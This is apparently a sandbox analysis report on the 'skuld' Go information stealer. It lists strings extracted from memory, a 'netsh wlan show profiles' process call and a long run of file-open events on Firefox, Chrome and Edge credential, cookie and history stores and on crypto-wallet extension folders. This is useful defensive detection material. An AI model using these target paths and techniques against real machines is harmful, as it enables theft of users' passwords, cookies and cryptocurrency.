unavailablenot dib format data: bufio: negative counthttp: nil Request.URLUNKNOWN_FRAME_TYPE_%dframe_ping_has_streamRoundTrip failure: %vheader list too largeUnhandled Setting: %vnet/http: nil Contextunknown address type command not supportedPrecondition RequiredInternal Server ErrorWindows Code Page 858186264514923095703125931322574615478515625GetVolumeInformationWEnableCounterForIoctlCM_Get_DevNode_StatusChangeServiceConfig2WDeregisterEventSourceEnumServicesStatusExWGetNamedSecurityInfoWSetNamedSecurityInfoWDwmGetWindowAttributeDwmSetWindowAttributeNtCreateNamedPipeFileSetupDiEnumDeviceInfoSetupUninstallOEMInfWWSALookupServiceNextWWTSEnumerateSessionsWbad type in compare: of unexported methodunexpected value stepreflect.Value.SetZeroreflect.Value.Pointerreflect.Value.SetUintNetUserGetLocalGroupsGetProfilesDirectoryWnegative shift amountdataindependenttimingsystem goroutine wait/gc/heap/allocs:bytesruntime: work.nwait= previous allocCount=, levelBits[level] = runtime: searchIdx = defer on system stackpanic on system stackasync stack too largestartm: m is spinningstartlockedm: m has pfindrunnable: wrong ppreempt at unknown pcreleasep: invalid argcheckdead:
                        Source: skuld.exe, 00000000.00000000.1453903511.0000000000E47000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: \Ethereum\keystore%s\extensions-tempreflect.Value.UintGetExitCodeProcesssegmentation faultoperation canceledno child processesconnection refusedRFS specific erroridentifier removedinput/output errormultihop attemptedfile name too longno locks availablestreams pipe errorLookupAccountNameWCreateFileMappingWGetFileAttributesWSetFileAttributesWCommandLineToArgvWunknown _txlock %qnon-minimal lengthtruncated sequencesequence truncatedcannot be negativeexceeded max depthinvalid character in numeric literalcontext.Backgroundunsupported formatbufio: buffer fullhttp: blank cookiereceived from peerFLOW_CONTROL_ERRORframe_goaway_shortproxy-authenticateUNKNOWN_SETTING_%dGo-http-client/2.0Go-http-client/1.1Temporary RedirectPermanent RedirectMethod Not AllowedExpectation Failedbad Content-Lengthfield value for %qIBM Code Page 1047IBM Code Page 1140Macintosh Cyrillicvalue out of range298023223876953125GetPerformanceInfoCM_MapCrToWin32ErrCloseServiceHandleCreateWellKnownSidGetSidSubAuthorityMakeSelfRelativeSDQueryServiceStatusCertGetNameStringWPFXImportCertStoreGetBestInterfaceExClosePseudoConsoleEscapeCommFunctionGetCommModemStatusGetComputerNameExWGetCurrentThreadIdGetModuleFileNameWGetModuleHandleExWGetVolumePathNameWRemoveDllDirectoryTerminateJobObjectWriteProcessMemoryEnumProcessModulesGetModuleBaseNameWreflect.Value.Elemreflect.Value.Typereflect: Zero(nil)adaptivestackstartdontfreezetheworldtraceadvanceperiodtracebackancestorsgarbage collectionsync.RWMutex.RLockGC worker (active)stopping the worldwait until GC endsbad lfnode addresssystem page size ( but memory size /gc/pauses:seconds because dotdotdotruntime: npages = invalid skip valueruntime: range = {index out of rangeruntime: gp: gp=runtime: getg: g=forEachP: not done in async preempt
                        Source: skuld.exe, 00000000.00000000.1453903511.0000000000E47000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: max=scav ptr ] = (usageinit ms, fault tab= top=[...], fp:MarchApril+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930monthGreekAdlamBamumBatakBuhidDograKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilcpu%dfilesimap2imap3imapspop3shostsrouteparseSHA-1sse41sse42ssse3matchrune NRGBAtls: Earlyutf-8%s*%dtext/bad n (at ClassP-224P-256P-384P-521ECDSAx32dbgvmsrvcprl_ccx96dbgdbgclrde4dotwindbgpc-retx64dbgghidraVMwarevmwarexc64zb8VizSM373836ALIONETVM-PCgeorgeGRAFPCT00917test42XC64ZB5Y3y73serverh86LHDDdQrgcQfofoGlK3zMRPgfV1XIZZuXj8vizsmASPNETS7WjufUser01tHiF2TGjBsjbLouiseGGw8NR3W1GJT-ForceattribNumberembedssqliteChromeChedotKometaFenrirCoowonLiebaoDragonCocCocYandexsecretpaypalbanquewalletcryptoexodusatomiccomptecreditpermisnumberbackupconfigVideosinlinefieldsConfigIntentMeteorImpactPolyMCBypassSystem
                        Source: skuld.exe, 00000000.00000000.1453903511.0000000000E47000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: %s profiles/invitesBytecoinEthereumElectrum%s\%s\%sCoinbaseCrocobitMetamaskStarcoinProgramsapp.asarGoStringFullPathno anodeCancelIoReadFileAcceptExWSAIoctlshutdownfile[%d]usernameicon_url%s:%d:%sbad instomitzerokernel32hijackedNO_ERRORPRIORITYSETTINGSLocation data=%q incr=%v ping=%qif-matchlocationhttp/1.1HTTP/2.0HTTP/1.1no-cacheContinueAcceptedConflict48828125infinitystrconv.parsing ParseIntcompressEqualSidSetEventIsWindowrecvfromnil PoolscavengepollDescsynctesttraceBufdeadlockraceFinipanicnilcgocheckrunnablerax rbx rcx rdx rdi rsi rbp rsp r8 r9 r10 r11 r12 r13 r14 r15 rip rflags cs fs gs is not pointer packed=BAD RANK status unknown(trigger= npages= nalloc= nfreed=[signal newval= mcount= bytes, stack=[ minLC= maxpc= stack=[ minutes status= etypes wsaioctlThursdaySaturdayFebruaryNovemberDecember%!Month(ZONEINFOArmenianBalineseBopomofoBugineseCherokeeCyrillicDuployanEthiopicGeorgianGujaratiGurmukhiHiraganaJavaneseKatakanaKayah_LiLinear_ALinear_BMahajaniOl_ChikiPhags_PaTagbanwaTai_ThamTai_VietTifinaghUgariticVithkuqinetedns0[::1]:53continue_gatewayinvalid address readfromunixgram
                        Source: skuld.exe, 00000000.00000000.1453903511.0000000000E47000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: invalid escape sequenceunsupported certificateno application protocolech accept confirmationCLIENT_TRAFFIC_SECRET_0SERVER_TRAFFIC_SECRET_0QUICEncryptionLevel(%v)varint integer overflowexit hook invoked panicpattern bits too long: too many pointers (>10)segment length too longunpacking Question.Nameunpacking Question.Typeskipping Question Classflate: internal error: invalid PrintableStringx509: malformed UTCTimex509: invalid key usagex509: malformed versionVariantTimeToSystemTimeSafeArrayCreateVectorExEd25519 sign and verifyed25519: bad public keyP224 point not on curveP256 point not on curveP384 point not on curveP521 point not on curveinvalid scalar encodingGetWindowThreadProcessId-EnableNetworkProtection\Coinomi\Coinomi\walletsfloating point exceptionconnection reset by peerlevel 2 not synchronizedlink number out of rangeout of streams resourcesfunction not implementedstructure needs cleaningnot supported by windowsCertFreeCertificateChainCreateToolhelp32SnapshotGetUserProfileDirectoryWGetProcessImageFileNameWexec: Stdout already setskuld - made by hackirbyjson: unsupported type: RegisterClipboardFormatAinvalid argument to Intnunexpected buffer len=%vinvalid pseudo-header %qframe_headers_prio_shortinvalid request :path %qread_frame_conn_error_%sapplication/octet-streamRequest Entity Too Largehttp: nil Request.Header116415321826934814453125582076609134674072265625AllocateAndInitializeSidBuildSecurityDescriptorWAssignProcessToJobObjectGenerateConsoleCtrlEventGetMaximumProcessorCountGetNamedPipeHandleStateWSetConsoleCursorPositionSetDefaultDllDirectoriesNtQuerySystemInformationSetupDiCreateDeviceInfoWSetupDiGetSelectedDeviceSetupDiSetSelectedDevicetracecheckstackownershiphash of unhashable type span has no free objectsruntime: found obj at *(runtime: VirtualFree of 
/cgo/go-to-c-calls:calls/gc/heap/objects:objects/sched/latencies:secondsqueuefinalizer during GCupdate during transitionruntime: markroot index can't scan our own stackgcDrainN phase incorrectpageAlloc: out of memoryruntime: p.searchAddr = range partially overlapsstack trace unavailable
                        Source: skuld.exe, 00000000.00000000.1453903511.0000000000E47000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: \Ethereum\keystore%s\extensions-tempreflect.Value.UintGetExitCodeProcesssegmentation faultoperation canceledno child processesconnection refusedRFS specific erroridentifier removedinput/output errormultihop attemptedfile name too longno locks availablestreams pipe errorLookupAccountNameWCreateFileMappingWGetFileAttributesWSetFileAttributesWCommandLineToArgvWunknown _txlock %qnon-minimal lengthtruncated sequencesequence truncatedcannot be negativeexceeded max depthinvalid character in numeric literalcontext.Backgroundunsupported formatbufio: buffer fullhttp: blank cookiereceived from peerFLOW_CONTROL_ERRORframe_goaway_shortproxy-authenticateUNKNOWN_SETTING_%dGo-http-client/2.0Go-http-client/1.1Temporary RedirectPermanent RedirectMethod Not AllowedExpectation Failedbad Content-Lengthfield value for %qIBM Code Page 1047IBM Code Page 1140Macintosh Cyrillicvalue out of range298023223876953125GetPerformanceInfoCM_MapCrToWin32ErrCloseServiceHandleCreateWellKnownSidGetSidSubAuthorityMakeSelfRelativeSDQueryServiceStatusCertGetNameStringWPFXImportCertStoreGetBestInterfaceExClosePseudoConsoleEscapeCommFunctionGetCommModemStatusGetComputerNameExWGetCurrentThreadIdGetModuleFileNameWGetModuleHandleExWGetVolumePathNameWRemoveDllDirectoryTerminateJobObjectWriteProcessMemoryEnumProcessModulesGetModuleBaseNameWreflect.Value.Elemreflect.Value.Typereflect: Zero(nil)adaptivestackstartdontfreezetheworldtraceadvanceperiodtracebackancestorsgarbage collectionsync.RWMutex.RLockGC worker (active)stopping the worldwait until GC endsbad lfnode addresssystem page size ( but memory size /gc/pauses:seconds because dotdotdotruntime: npages = invalid skip valueruntime: range = {index out of rangeruntime: gp: gp=runtime: getg: g=forEachP: not done in async preempt
                        Source: C:\Users\user\Desktop\skuld.exe | Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                        Source: C:\Users\user\Desktop\skuld.exe | Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                        Source: C:\Users\user\Desktop\skuld.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ebfidpplhabeedpnhjnobghokpiioolj
                        Source: C:\Users\user\Desktop\skuld.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite
                        Source: C:\Users\user\Desktop\skuld.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shm
                        Source: C:\Users\user\Desktop\skuld.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\storage\ls-archive.sqlite
                        Source: C:\Users\user\Desktop\skuld.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
                        Source: C:\Users\user\Desktop\skuld.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\places.sqlite
                        Source: C:\Users\user\Desktop\skuld.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mfgccjchihfkkindfppnaooecgfneiii
                        Source: C:\Users\user\Desktop\skuld.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\datareporting\glean\events
                        Source: C:\Users\user\Desktop\skuld.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcckkdbjnoikooededlapcalpionmalo
                        Source: C:\Users\user\Desktop\skuld.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\datareporting\glean\tmp
                        Source: C:\Users\user\Desktop\skuld.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
                        Source: C:\Users\user\Desktop\skuld.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\favicons.sqlite-shm
                        Source: C:\Users\user\Desktop\skuld.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cgeeodpfagjceefieflmdfphplkenlfk
                        Source: C:\Users\user\Desktop\skuld.exe | File opened: C:\Users\Default\AppData\Roaming\8pecxstudios\Cyberfox\Profiles
                        Source: C:\Users\user\Desktop\skuld.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nphplpgoakhhjchkkhmiggakijnkhfnd
                        Source: C:\Users\user\Desktop\skuld.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\storage\permanent\chrome
                        Source: C:\Users\user\Desktop\skuld.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
                        Source: C:\Users\user\Desktop\skuld.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\cookies.sqlite-shm
                        Source: C:\Users\user\Desktop\skuld.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\minidumps
                        Source: C:\Users\user\Desktop\skuld.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
                        Source: C:\Users\user\Desktop\skuld.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log
                        Source: C:\Users\user\Desktop\skuld.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
                        Source: C:\Users\user\Desktop\skuld.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\gmacpqja.default
                        Source: C:\Users\user\Desktop\skuld.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\datareporting\glean
                        Source: C:\Users\user\Desktop\skuld.exe | File opened: C:\Users\Public\AppData\Roaming\Mozilla\Firefox\Profiles
                        Source: C:\Users\user\Desktop\skuld.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
                        Source: C:\Users\user\Desktop\skuld.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite
                        Source: C:\Users\user\Desktop\skuld.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\key4.db
                        Source: C:\Users\user\Desktop\skuld.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files
                        Source: C:\Users\user\Desktop\skuld.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhilaheimglignddkjgofkcbgekhenbh
                        Source: C:\Users\user\Desktop\skuld.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\webappsstore.sqlite-wal
                        Source: C:\Users\user\Desktop\skuld.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-wal
                        Source: C:\Users\user\Desktop\skuld.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
                        Source: C:\Users\user\Desktop\skuld.exe | File opened: C:\Users\Public\AppData\Roaming\8pecxstudios\Cyberfox\Profiles
                        Source: C:\Users\user\Desktop\skuld.exe | File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\Profiles
                        Source: C:\Users\user\Desktop\skuld.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pocmplpaccanhmnllbbkpgfliimjljgo
                        Source: C:\Users\user\Desktop\skuld.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
                        Source: C:\Users\user\Desktop\skuld.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-wal
                        Source: C:\Users\user\Desktop\skuld.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
                        Source: C:\Users\user\Desktop\skuld.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
                        Source: C:\Users\user\Desktop\skuld.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite
                        Source: C:\Users\user\Desktop\skuld.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
                        Source: C:\Users\user\Desktop\skuld.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-wal
                        Source: C:\Users\user\Desktop\skuld.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cmndjbecilbocjfkibfbifhngkdmjgog
                        Source: C:\Users\user\Desktop\skuld.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
                        Source: C:\Users\user\Desktop\skuld.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite
                        Source: C:\Users\user\Desktop\skuld.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb
                        Source: C:\Users\user\Desktop\skuld.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\storage\permanent\chrome\idb
                        Source: C:\Users\user\Desktop\skuld.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
                        Source: C:\Users\user\Desktop\skuld.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files
                        Source: C:\Users\user\Desktop\skuld.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite
                        Source: C:\Users\user\Desktop\skuld.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
                        Source: C:\Users\user\Desktop\skuld.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
                        Source: C:\Users\user\Desktop\skuld.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjmkndjhnagcfbpiemnkdpomccnjblmj
                        Source: C:\Users\user\Desktop\skuld.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\datareporting
                        Source: C:\Users\user\Desktop\skuld.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-shm
                        Source: C:\Users\user\Desktop\skuld.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfel
                        Source: C:\Users\user\Desktop\skuld.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
                        Source: C:\Users\user\Desktop\skuld.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\protections.sqlite
                        Source: C:\Users\user\Desktop\skuld.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mfhbebgoclkghebffdldpobeajmbecfk
                        Source: C:\Users\user\Desktop\skuld.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\cookies.sqlite
                        Source: C:\Users\user\Desktop\skuld.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\permissions.sqlite
                        Source: C:\Users\user\Desktop\skuld.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-wal
                        Source: C:\Users\user\Desktop\skuld.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                        Source: C:\Users\user\Desktop\skuld.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-wal
                        Source: C:\Users\user\Desktop\skuld.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\agoakfejjabomempkjlepdflaleeobhb
                        Source: C:\Users\user\Desktop\skuld.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-shm
                        Source: C:\Users\user\Desktop\skuld.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
                        Source: C:\Users\user\Desktop\skuld.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                        Source: C:\Users\user\Desktop\skuld.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
                        Source: C:\Users\user\Desktop\skuld.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnnegphlobjdpkhecapkijjdkgcjhkib
                        Source: C:\Users\user\Desktop\skuld.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files
                        Source: C:\Users\user\Desktop\skuld.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\datareporting\glean\pending_pings
                        Source: C:\Users\user\Desktop\skuld.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                        Source: C:\Users\user\Desktop\skuld.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\storage\temporary
                        Source: C:\Users\user\Desktop\skuld.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hmeobnfnfcmdkdcmlblgagmfpfboieaf
                        Source: C:\Users\user\Desktop\skuld.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\logins.json
                        Source: C:\Users\user\Desktop\skuld.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
                        Source: C:\Users\user\Desktop\skuld.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\storage\to-be-removed
                        Source: C:\Users\user\Desktop\skuld.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files
                        Source: C:\Users\user\Desktop\skuld.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                        Source: C:\Users\user\Desktop\skuld.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-shm
                        Source: C:\Users\user\Desktop\skuld.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
                        Source: C:\Users\user\Desktop\skuld.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\favicons.sqlite
                        Source: C:\Users\user\Desktop\skuld.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shm
                        Source: C:\Users\user\Desktop\skuld.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\security_state
                        Source: C:\Users\user\Desktop\skuld.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\places.sqlite-shm
                        Source: C:\Users\user\Desktop\skuld.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
                        Source: C:\Users\user\Desktop\skuld.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-shm
                        Source: C:\Users\user\Desktop\skuld.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                        Source: C:\Users\user\Desktop\skuld.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
                        Source: C:\Users\user\Desktop\skuld.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\storage
                        Source: C:\Users\user\Desktop\skuld.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
                        Source: C:\Users\user\Desktop\skuld.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
                        Source: C:\Users\user\Desktop\skuld.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\datareporting\archived
                        Source: C:\Users\user\Desktop\skuld.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\storage\permanent
                        Source: C:\Users\user\Desktop\skuld.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\places.sqlite-wal
                        Source: C:\Users\user\Desktop\skuld.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\crashes
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aodkkagnadcbobfpggfnjeongemjbjcaJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-walJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\storage.sqliteJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\storage\permanent\chrome\idb\2918063365piupsah.filesJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\favicons.sqlite-walJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\datareporting\glean\dbJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\storage\defaultJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jblndlipeogpafnldhgmapagcccfchpiJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\cookies.sqlite-walJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
